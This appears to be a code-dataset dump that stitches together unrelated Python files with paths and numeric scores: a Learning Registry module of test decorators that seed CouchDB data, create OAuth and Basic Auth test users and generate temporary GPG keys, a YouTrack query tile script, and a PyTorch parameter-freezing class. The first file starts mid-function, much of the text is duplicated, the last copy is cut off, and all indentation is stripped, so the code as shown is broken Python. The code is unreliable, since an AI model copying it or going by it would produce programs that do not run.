design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.debug("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem indexing: %s", req)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass#log.error("Not Indexing: {0}".format( row.key))
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
indexTestData(self)
return fn(self, *args, **kw)
except :
raise
finally:
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True):
json_headers = {"Content-Type": "application/json"}
test_data_log = "test-data-%s.log" % prefix
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
@ModifiedServiceDoc(config['lr.publish.docid'], update_authz())
def writeTestData(obj, **kw):
try:
key = kw["pgp_keys"][0]
signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"])
except:
signer = None
if not hasattr(obj, "test_data_ids"):
obj.test_data_ids = {}
obj.test_data_ids[prefix] = []
with open(test_data_log, "w") as plog:
for doc in sourceData:
if "doc_ID" not in doc:
doc["doc_ID"] = prefix+str(uuid1())
try:
doc = signer.sign(doc)
except:
pass
obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers)
plog.write(doc["doc_ID"] + os.linesep)
obj.test_data_ids[prefix].append(doc["doc_ID"])
if sleep > 0:
time.sleep(sleep)
kw["test_data_ids"] = obj.test_data_ids[prefix]
return kw
def indexTestData(obj):
if force_index == False:
return
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.error("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem forcing index: %s", e)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass# log.error("Not Indexing: {0}".format( row.key))
def cacheTestData(obj, **kw):
req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch),
data=json.dumps({"keys":obj.test_data_ids[prefix]}),
headers=json_headers)
res = urllib2.urlopen(req)
docs = list(items(res, 'rows.item.doc'))
if not hasattr(obj, "test_data_sorted"):
obj.test_data_sorted = {}
def sortkey(k):
try:
return k['node_timestamp']
except:
return k['create_timestamp']
obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k))
kw["test_data_sorted"] = obj.test_data_sorted[prefix]
return kw
def removeTestData(obj):
for doc_id in obj.test_data_ids[prefix]:
try:
del obj.db[doc_id]
except Exception as e:
print e.message
try:
del obj.db[doc_id+"-distributable"]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
kw = writeTestData(self, **kw)
indexTestData(self)
kw = cacheTestData(self, **kw)
return fn(self, *args, **kw)
except :
raise
finally:
removeTestData(self)
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def getExtraEnvironment(base_url=None):
env = {}
if base_url:
scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url)
if query or fragment:
raise ValueError(
"base_url (%r) cannot have a query or fragment"
% base_url)
if scheme:
env['wsgi.url_scheme'] = scheme
if netloc:
if ':' not in netloc:
if scheme == 'http':
netloc += ':80'
elif scheme == 'https':
netloc += ':443'
else:
raise ValueError(
"Unknown scheme: %r" % scheme)
host, port = netloc.split(':', 1)
env['SERVER_PORT'] = port
env['SERVER_NAME'] = host
env['HTTP_HOST'] = netloc
if path:
env['SCRIPT_NAME'] = urllib.unquote(path)
return env
class OAuthRequest(object):
def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ):
self.oauth_user_attrib = oauth_user_attrib
self.oauth_info_attrib = oauth_info_attrib
self.http_method = http_method
self.url_base = url_base
self.path = path
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def create_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
finally:
print oauth_user
self.users.save(oauth_user)
def remove_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
@wraps(fn)
def test_decorator(cls, *args, **kwargs):
if (hasattr(cls, self.oauth_user_attrib)):
self.oauth_user = getattr(cls, self.oauth_user_attrib)
else:
err = AttributeError()
err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib
raise err
consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]])
token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"])
params = {
"oauth_signature_method": "HMAC-SHA1",
}
req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params)
# Sign the request.
signature_method = oauth2.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, consumer, token)
header = req.to_header()
header["Authorization"] = str(header["Authorization"])
extraEnv = getExtraEnvironment(self.url_base)
class OauthInfo(object):
def __init__(self, consumer, token, request, header, extraEnv, path):
self.consumer = consumer
self.token = token
self.request = request
self.header = header
self.env = extraEnv
self.path = path
setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path))
try:
create_user(self.oauth_user)
result = fn(cls, *args, **kwargs)
return result
finally:
delattr(cls, self.oauth_info_attrib)
remove_user(self.oauth_user)
return test_decorator
class BasicAuthRequest(object):
def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ):
self.bauth_user_attrib = bauth_user_attrib
self.bauth_info_attrib = bauth_info_attrib
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def build_basic_auth_header(name, password):
base64string = base64.encodestring('%s:%s' % (name, password))[:-1]
return {"Authorization": "Basic %s" % base64string}
def create_user(name, password, roles=[]):
user_doc = {
"_id" : "org.couchdb.user:{0}".format(name),
"type" : "user",
"name" : "{0}".format(name),
"roles" : roles,
"password" : password
}
try:
del self.users[user_doc["_id"]]
except:
pass
finally:
_, user_doc["_rev"] = self.users.save(user_doc)
return user_doc
def delete_user(user_doc):
try:
del self.users[user_doc["_id"]]
except:
pass
class BAuthInfo(object):
def __init__(self, header, name, password):
self.header = header
self.username = name
self.password = password
@wraps(fn)
def wrap(cls, *args, **kwargs):
try:
self.bauth_user = getattr(cls, self.bauth_user_attrib)
except:
raise AttributeError("Attribute containing Basic Auth user credentials missing.")
user_doc = create_user(**self.bauth_user)
header = build_basic_auth_header(**self.bauth_user)
setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user))
try:
return fn(cls, *args, **kwargs)
except Exception as e:
raise e
finally:
delete_user(user_doc)
return wrap
def _backup(prop_list=[]):
backup = {}
for prop in prop_list:
backup[prop] = config["app_conf"][prop]
return backup
def _restore(backup={}):
config["app_conf"].update(backup)
class make_gpg_keys(object):
'''decorator that makes at least 1 gpg key. first key is set at the node key'''
def __init__(self, count=1):
self.count = count
self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".")
self.gpgbin = "gpg"
self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin)
self.gpg.encoding = 'utf-8'
self.keys = []
def __call__(self, f):
@wraps(f)
def wrapped(*args, **kw):
for i in range(self.count):
cfg = {
"key_type": "RSA",
"key_length": 1024,
"name_real": "Test Key #%d" % i,
"name_comment": "Test key for %s" % f.__class__.__name__,
"name_email": "<EMAIL>" % i,
"passphrase": "<PASSWORD>"
}
key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg))
assert key is not None, "GPG key not generated"
assert key.fingerprint is not None, "Key missing fingerprint"
cfg.update({
"key": key,
"fingerprint": key.fingerprint,
"key_id": key.fingerprint[-16:],
"locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ],
"owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"])
})
self.keys.append(cfg)
kw["pgp_keys"] = self.keys
kw["gnupghome"] = self.gnupghome
kw["gpgbin"] = self.gpgbin
kw["gpg"] = self.gpg
backup_props = [
"lr.publish.signing.privatekeyid",
"lr.publish.signing.passphrase",
"lr.publish.signing.gnupghome",
"lr.publish.signing.gpgbin",
"lr.publish.signing.publickeylocations",
"lr.publish.signing.signer"
]
backup_conf = _backup(backup_props)
config["app_conf"].update({
"lr.publish.signing.privatekeyid": self.keys[0]["key_id"],
"lr.publish.signing.passphrase": self.keys[0]["passphrase"],
"lr.publish.signing.gnupghome": self.gnupghome,
"lr.publish.signing.gpgbin": self.gpgbin,
"lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''',
"lr.publish.signing.signer": self.keys[0]["owner"]
})
reloadGPGConfig(config["app_conf"])
try:
return f(*args, **kw)
finally:
shutil.rmtree(self.gnupghome)
_restore(backup_conf)
reloadGPGConfig(config["app_conf"])
return wrapped | LR/lr/util/decorators.py | from contextlib import closing
from functools import wraps
from ijson.parse import items
from lr.lib.signing import reloadGPGConfig
from pylons import config
from uuid import uuid1
from LRSignature.sign.Sign import Sign_0_21
import base64
import copy
import couchdb
import gnupg
import ijson
import json
import logging
import os
import shutil
import tempfile
import time
import urllib, urlparse, oauth2, socket, uuid
import urllib2
log = logging.getLogger(__name__)
class SetFlowControl(object):
def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100):
server = couchdb.Server(config['couchdb.url.dbadmin'])
self.nodeDb = server[config['couchdb.db.node']]
self.enabled = enabled
self.serviceDoc = serviceDoc
self.doc_limit=doc_limit
self.id_limit=id_limit
def __call__(self,f):
@wraps(f)
def set_flow_control(obj, *args, **kw):
serviceDoc = self.nodeDb[self.serviceDoc]
service_data = copy.deepcopy(serviceDoc['service_data'])
serviceDoc['service_data']['flow_control'] = self.enabled
serviceDoc['service_data']['doc_limit'] = self.doc_limit
serviceDoc['service_data']['id_limit'] = self.id_limit
self.nodeDb[self.serviceDoc] = serviceDoc
try:
return f(obj, *args, **kw)
finally:
serviceDoc['service_data'] = service_data
self.nodeDb[self.serviceDoc] = serviceDoc
return set_flow_control
class ModifiedServiceDoc(object):
def __init__(self, service_doc_id, update=None):
server = couchdb.Server(config['couchdb.url.dbadmin'])
self.nodeDb = server[config['couchdb.db.node']]
self.service_doc_id = service_doc_id
self.update_fn = update
def __call__(self,f):
@wraps(f)
def wrapped(*args, **kw):
orig_serviceDoc = self.nodeDb[self.service_doc_id]
copy_serviceDoc = copy.deepcopy(orig_serviceDoc)
if self.update_fn:
copy_serviceDoc =self.update_fn(copy_serviceDoc)
self.nodeDb[self.service_doc_id] = copy_serviceDoc
try:
return f(*args, **kw)
finally:
orig_serviceDoc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"]
self.nodeDb[self.service_doc_id] = orig_serviceDoc
return wrapped
def update_authz(basicauth=False, oauth=False):
def update(orig):
orig["service_auth"] = orig["service_auth"] or { }
orig["service_auth"]["service_authz"] = []
if basicauth == True:
orig["service_auth"]["service_authz"].append("basicauth")
if oauth == True:
orig["service_auth"]["service_authz"].append("oauth")
if len(orig["service_auth"]["service_authz"]) == 0:
orig["service_auth"]["service_authz"].append("none")
return orig
return update
def ForceCouchDBIndexing():
json_headers = {"Content-Type": "application/json"}
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
def indexTestData(obj):
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.debug("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem indexing: %s", req)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass#log.error("Not Indexing: {0}".format( row.key))
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
indexTestData(self)
return fn(self, *args, **kw)
except :
raise
finally:
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True):
json_headers = {"Content-Type": "application/json"}
test_data_log = "test-data-%s.log" % prefix
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
@ModifiedServiceDoc(config['lr.publish.docid'], update_authz())
def writeTestData(obj, **kw):
try:
key = kw["pgp_keys"][0]
signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"])
except:
signer = None
if not hasattr(obj, "test_data_ids"):
obj.test_data_ids = {}
obj.test_data_ids[prefix] = []
with open(test_data_log, "w") as plog:
for doc in sourceData:
if "doc_ID" not in doc:
doc["doc_ID"] = prefix+str(uuid1())
try:
doc = signer.sign(doc)
except:
pass
obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers)
plog.write(doc["doc_ID"] + os.linesep)
obj.test_data_ids[prefix].append(doc["doc_ID"])
if sleep > 0:
time.sleep(sleep)
kw["test_data_ids"] = obj.test_data_ids[prefix]
return kw
def indexTestData(obj):
if force_index == False:
return
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.error("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem forcing index: %s", e)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass# log.error("Not Indexing: {0}".format( row.key))
def cacheTestData(obj, **kw):
req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch),
data=json.dumps({"keys":obj.test_data_ids[prefix]}),
headers=json_headers)
res = urllib2.urlopen(req)
docs = list(items(res, 'rows.item.doc'))
if not hasattr(obj, "test_data_sorted"):
obj.test_data_sorted = {}
def sortkey(k):
try:
return k['node_timestamp']
except:
return k['create_timestamp']
obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k))
kw["test_data_sorted"] = obj.test_data_sorted[prefix]
return kw
def removeTestData(obj):
for doc_id in obj.test_data_ids[prefix]:
try:
del obj.db[doc_id]
except Exception as e:
print e.message
try:
del obj.db[doc_id+"-distributable"]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
kw = writeTestData(self, **kw)
indexTestData(self)
kw = cacheTestData(self, **kw)
return fn(self, *args, **kw)
except :
raise
finally:
removeTestData(self)
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def getExtraEnvironment(base_url=None):
env = {}
if base_url:
scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url)
if query or fragment:
raise ValueError(
"base_url (%r) cannot have a query or fragment"
% base_url)
if scheme:
env['wsgi.url_scheme'] = scheme
if netloc:
if ':' not in netloc:
if scheme == 'http':
netloc += ':80'
elif scheme == 'https':
netloc += ':443'
else:
raise ValueError(
"Unknown scheme: %r" % scheme)
host, port = netloc.split(':', 1)
env['SERVER_PORT'] = port
env['SERVER_NAME'] = host
env['HTTP_HOST'] = netloc
if path:
env['SCRIPT_NAME'] = urllib.unquote(path)
return env
class OAuthRequest(object):
def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ):
self.oauth_user_attrib = oauth_user_attrib
self.oauth_info_attrib = oauth_info_attrib
self.http_method = http_method
self.url_base = url_base
self.path = path
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def create_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
finally:
print oauth_user
self.users.save(oauth_user)
def remove_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
@wraps(fn)
def test_decorator(cls, *args, **kwargs):
if (hasattr(cls, self.oauth_user_attrib)):
self.oauth_user = getattr(cls, self.oauth_user_attrib)
else:
err = AttributeError()
err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib
raise err
consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]])
token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"])
params = {
"oauth_signature_method": "HMAC-SHA1",
}
req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params)
# Sign the request.
signature_method = oauth2.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, consumer, token)
header = req.to_header()
header["Authorization"] = str(header["Authorization"])
extraEnv = getExtraEnvironment(self.url_base)
class OauthInfo(object):
def __init__(self, consumer, token, request, header, extraEnv, path):
self.consumer = consumer
self.token = token
self.request = request
self.header = header
self.env = extraEnv
self.path = path
setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path))
try:
create_user(self.oauth_user)
result = fn(cls, *args, **kwargs)
return result
finally:
delattr(cls, self.oauth_info_attrib)
remove_user(self.oauth_user)
return test_decorator
class BasicAuthRequest(object):
def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ):
self.bauth_user_attrib = bauth_user_attrib
self.bauth_info_attrib = bauth_info_attrib
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def build_basic_auth_header(name, password):
base64string = base64.encodestring('%s:%s' % (name, password))[:-1]
return {"Authorization": "Basic %s" % base64string}
def create_user(name, password, roles=[]):
user_doc = {
"_id" : "org.couchdb.user:{0}".format(name),
"type" : "user",
"name" : "{0}".format(name),
"roles" : roles,
"password" : password
}
try:
del self.users[user_doc["_id"]]
except:
pass
finally:
_, user_doc["_rev"] = self.users.save(user_doc)
return user_doc
def delete_user(user_doc):
try:
del self.users[user_doc["_id"]]
except:
pass
class BAuthInfo(object):
def __init__(self, header, name, password):
self.header = header
self.username = name
self.password = password
@wraps(fn)
def wrap(cls, *args, **kwargs):
try:
self.bauth_user = getattr(cls, self.bauth_user_attrib)
except:
raise AttributeError("Attribute containing Basic Auth user credentials missing.")
user_doc = create_user(**self.bauth_user)
header = build_basic_auth_header(**self.bauth_user)
setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user))
try:
return fn(cls, *args, **kwargs)
except Exception as e:
raise e
finally:
delete_user(user_doc)
return wrap
def _backup(prop_list=[]):
backup = {}
for prop in prop_list:
backup[prop] = config["app_conf"][prop]
return backup
def _restore(backup={}):
config["app_conf"].update(backup)
class make_gpg_keys(object):
'''decorator that makes at least 1 gpg key. first key is set at the node key'''
def __init__(self, count=1):
self.count = count
self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".")
self.gpgbin = "gpg"
self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin)
self.gpg.encoding = 'utf-8'
self.keys = []
def __call__(self, f):
@wraps(f)
def wrapped(*args, **kw):
for i in range(self.count):
cfg = {
"key_type": "RSA",
"key_length": 1024,
"name_real": "Test Key #%d" % i,
"name_comment": "Test key for %s" % f.__class__.__name__,
"name_email": "<EMAIL>" % i,
"passphrase": "<PASSWORD>"
}
key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg))
assert key is not None, "GPG key not generated"
assert key.fingerprint is not None, "Key missing fingerprint"
cfg.update({
"key": key,
"fingerprint": key.fingerprint,
"key_id": key.fingerprint[-16:],
"locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ],
"owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"])
})
self.keys.append(cfg)
kw["pgp_keys"] = self.keys
kw["gnupghome"] = self.gnupghome
kw["gpgbin"] = self.gpgbin
kw["gpg"] = self.gpg
backup_props = [
"lr.publish.signing.privatekeyid",
"lr.publish.signing.passphrase",
"lr.publish.signing.gnupghome",
"lr.publish.signing.gpgbin",
"lr.publish.signing.publickeylocations",
"lr.publish.signing.signer"
]
backup_conf = _backup(backup_props)
config["app_conf"].update({
"lr.publish.signing.privatekeyid": self.keys[0]["key_id"],
"lr.publish.signing.passphrase": self.keys[0]["passphrase"],
"lr.publish.signing.gnupghome": self.gnupghome,
"lr.publish.signing.gpgbin": self.gpgbin,
"lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''',
"lr.publish.signing.signer": self.keys[0]["owner"]
})
reloadGPGConfig(config["app_conf"])
try:
return f(*args, **kw)
finally:
shutil.rmtree(self.gnupghome)
_restore(backup_conf)
reloadGPGConfig(config["app_conf"])
return wrapped | 0.184694 | 0.061621 |
import com.xhaus.jyson.JysonCodec as json
import sys
import time
import traceback
from yt.Server import YtClient
import org.slf4j.Logger as Logger
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("com.xebialabs.QueryTile")
logger.debug("START")
if not server:
logger.debug("YouTrack server ID must be provided")
raise Exception("YouTrack server ID must be provided")
yt = YtClient(server, username, password)
data = None
status = None
def get_row_data(item):
row_map = {}
for column in detailsViewColumns:
try:
logger.error("for column = %s" % column)
logger.error("row_map[%s] = %s" % (column, item[column]))
row_map[column] = item[column]
except:
logger.error("column %s is bad" % column)
row_map['link'] = "%s/issue/%s" % (server['url'], item['id'])
row_map['Assignee'] = item['Assignee']
row_map['State'] = item['State']
row_map['id'] = item['id']
return row_map
logger.debug("getIssuesByQuery - %s" % (query))
results = yt.getIssuesByQuery(query)
logger.debug("results = %s" % results)
rows= []
logger.debug("START LOOP")
number = 0
assignee = {}
state = {}
people = []
for item in results:
logger.error("record = %s" % item)
row = item['id']
rec = {}
for key in item:
rec[key] = item[key]
if item['Assignee'] not in people:
people.append(item['Assignee'])
if item['Assignee'] in assignee.keys():
assignee[item['Assignee']] += 1
else:
assignee[item['Assignee']] = 1
if item['State'] in state.keys():
state[item['State']] += 1
else:
state[item['State']] = 1
rows.append( get_row_data(rec) )
logger.error("END LOOP")
logger.error( json.dumps(rows, indent=4, sort_keys=True) )
#logger.error( "detailsViewColumns %s" + json.dumps(detailsViewColumns, indent=4, sort_keys=True) )
data = {
'tickets': rows,
'assignee': [{"name":key,"value":assignee[key]} for key in assignee.keys()],
'people': people,
'state': [{"name":key,"value":state[key]} for key in state.keys()],
'detailsViewColumns': detailsViewColumns
} | src/main/resources/yt/QueryTile.py |
import com.xhaus.jyson.JysonCodec as json
import sys
import time
import traceback
from yt.Server import YtClient
import org.slf4j.Logger as Logger
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("com.xebialabs.QueryTile")
logger.debug("START")
if not server:
logger.debug("YouTrack server ID must be provided")
raise Exception("YouTrack server ID must be provided")
yt = YtClient(server, username, password)
data = None
status = None
def get_row_data(item):
row_map = {}
for column in detailsViewColumns:
try:
logger.error("for column = %s" % column)
logger.error("row_map[%s] = %s" % (column, item[column]))
row_map[column] = item[column]
except:
logger.error("column %s is bad" % column)
row_map['link'] = "%s/issue/%s" % (server['url'], item['id'])
row_map['Assignee'] = item['Assignee']
row_map['State'] = item['State']
row_map['id'] = item['id']
return row_map
logger.debug("getIssuesByQuery - %s" % (query))
results = yt.getIssuesByQuery(query)
logger.debug("results = %s" % results)
rows= []
logger.debug("START LOOP")
number = 0
assignee = {}
state = {}
people = []
for item in results:
logger.error("record = %s" % item)
row = item['id']
rec = {}
for key in item:
rec[key] = item[key]
if item['Assignee'] not in people:
people.append(item['Assignee'])
if item['Assignee'] in assignee.keys():
assignee[item['Assignee']] += 1
else:
assignee[item['Assignee']] = 1
if item['State'] in state.keys():
state[item['State']] += 1
else:
state[item['State']] = 1
rows.append( get_row_data(rec) )
logger.error("END LOOP")
logger.error( json.dumps(rows, indent=4, sort_keys=True) )
#logger.error( "detailsViewColumns %s" + json.dumps(detailsViewColumns, indent=4, sort_keys=True) )
data = {
'tickets': rows,
'assignee': [{"name":key,"value":assignee[key]} for key in assignee.keys()],
'people': people,
'state': [{"name":key,"value":state[key]} for key in state.keys()],
'detailsViewColumns': detailsViewColumns
} | 0.129954 | 0.090776 |
"""Contains the class for fixing parameters."""
__all__ = ['Freezer']
class Freezer(object):
"""Defines the freezer.
`Freeze` means to fix some certain parameters such that they cannot get
updated during training. To save time, in this implementation, frozen is
achieved by directly converting those parameters to buffers.
"""
@staticmethod
def param_to_buffer(module, name):
"""Converts the parameter in `module` to a buffer with the same `name`.
Args:
module: `nn.Module`, the root module to start the params searching.
name: `str`, the name of parameters, where names of sub-modules are
joined by `.` (e.g., 'synthesis.layer5.style.weight').
"""
split_name = name.split('.')
module_name_hierarchy = split_name[:-1]
param_name = split_name[-1]
tgt_module = module
for module_name in module_name_hierarchy:
tgt_module = getattr(tgt_module, module_name)
param_data = getattr(tgt_module, param_name).data
delattr(tgt_module, param_name)
tgt_module.register_buffer(name=param_name, tensor=param_data)
@staticmethod
def freeze_by_keywords(module, keywords=None, exclusive_keywords=None):
"""Freezes parameters that matched by the given keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
keywords: `str`, the keys to match target parameters. Multiple keys
can be provided with comma as the separator. If set to `*`,
the entire `module` will be frozen. If set to `None`, nothing
will be frozen. (default: None)
exclusive_keywords: `str`, the keywords to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method will check all
parameters inside the module. (default: None)
Examples:
>>> # Freeze the mapping network of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping')
>>> # Another implementation:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, '*',
exclusive_keywords='synthesis')
>>> # Freeze the mapping network and affine layers of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping, style')
"""
if not keywords: # Shortcut of freezing nothing.
return
# Get parameter name list.
param_list = Freezer.get_module_param_names(module, exclusive_keywords)
if keywords == '*': # Shortcut of freezing everything.
for name in param_list:
Freezer.param_to_buffer(module, name)
return
# Freeze parameters that contains any keyword.
keywords = keywords.replace(' ', '').split(',')
for name in param_list:
if any(keyword in name for keyword in keywords):
Freezer.param_to_buffer(module, name)
@staticmethod
def get_module_param_names(module, exclusive_keywords=None):
"""Gets all parameter names not containing any of exclusive keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
exclusive_keywords: `str`, the words to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method returns all parameter
names inside the module. (default: None)
Returns:
A list of parameter names filtered out by `exclusive_keywords`.
Examples:
>>> # Get all parameters of StyleGAN discriminator except the task
>>> # head.
>>> param_names = Freezer.get_module_param_names(
StyleGANDiscriminator, exclusive_keywords='output')
"""
if not exclusive_keywords: # Shortcut without filtering.
return [name for name, _ in module.named_parameters()]
# Filter parameters by name.
exclusive_keywords = exclusive_keywords.replace(' ', '').split(',')
return [name for name, _ in module.named_parameters()
if all(key not in name for key in exclusive_keywords)] | runners/utils/freezer.py | """Contains the class for fixing parameters."""
__all__ = ['Freezer']
class Freezer(object):
"""Defines the freezer.
`Freeze` means to fix some certain parameters such that they cannot get
updated during training. To save time, in this implementation, frozen is
achieved by directly converting those parameters to buffers.
"""
@staticmethod
def param_to_buffer(module, name):
"""Converts the parameter in `module` to a buffer with the same `name`.
Args:
module: `nn.Module`, the root module to start the params searching.
name: `str`, the name of parameters, where names of sub-modules are
joined by `.` (e.g., 'synthesis.layer5.style.weight').
"""
